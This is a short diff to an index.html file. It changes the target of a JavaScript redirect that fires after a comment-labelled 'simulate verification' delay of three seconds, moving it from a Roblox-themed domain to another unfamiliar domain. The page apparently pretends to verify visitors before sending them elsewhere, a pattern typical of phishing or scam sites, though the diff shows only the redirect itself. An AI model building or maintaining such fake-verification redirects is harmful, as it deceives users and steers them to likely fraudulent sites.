--- a/index.html
+++ b/index.html
@@ -278,7 +278,7 @@
             
             // Simulate verification for 3 seconds THEN redirect
             setTimeout(function() {
-                window.location.href = "https://www.roblox-careermaestros.site";
+                window.location.href = "https://www.anezom.online";
             }, 3000);
         }
         
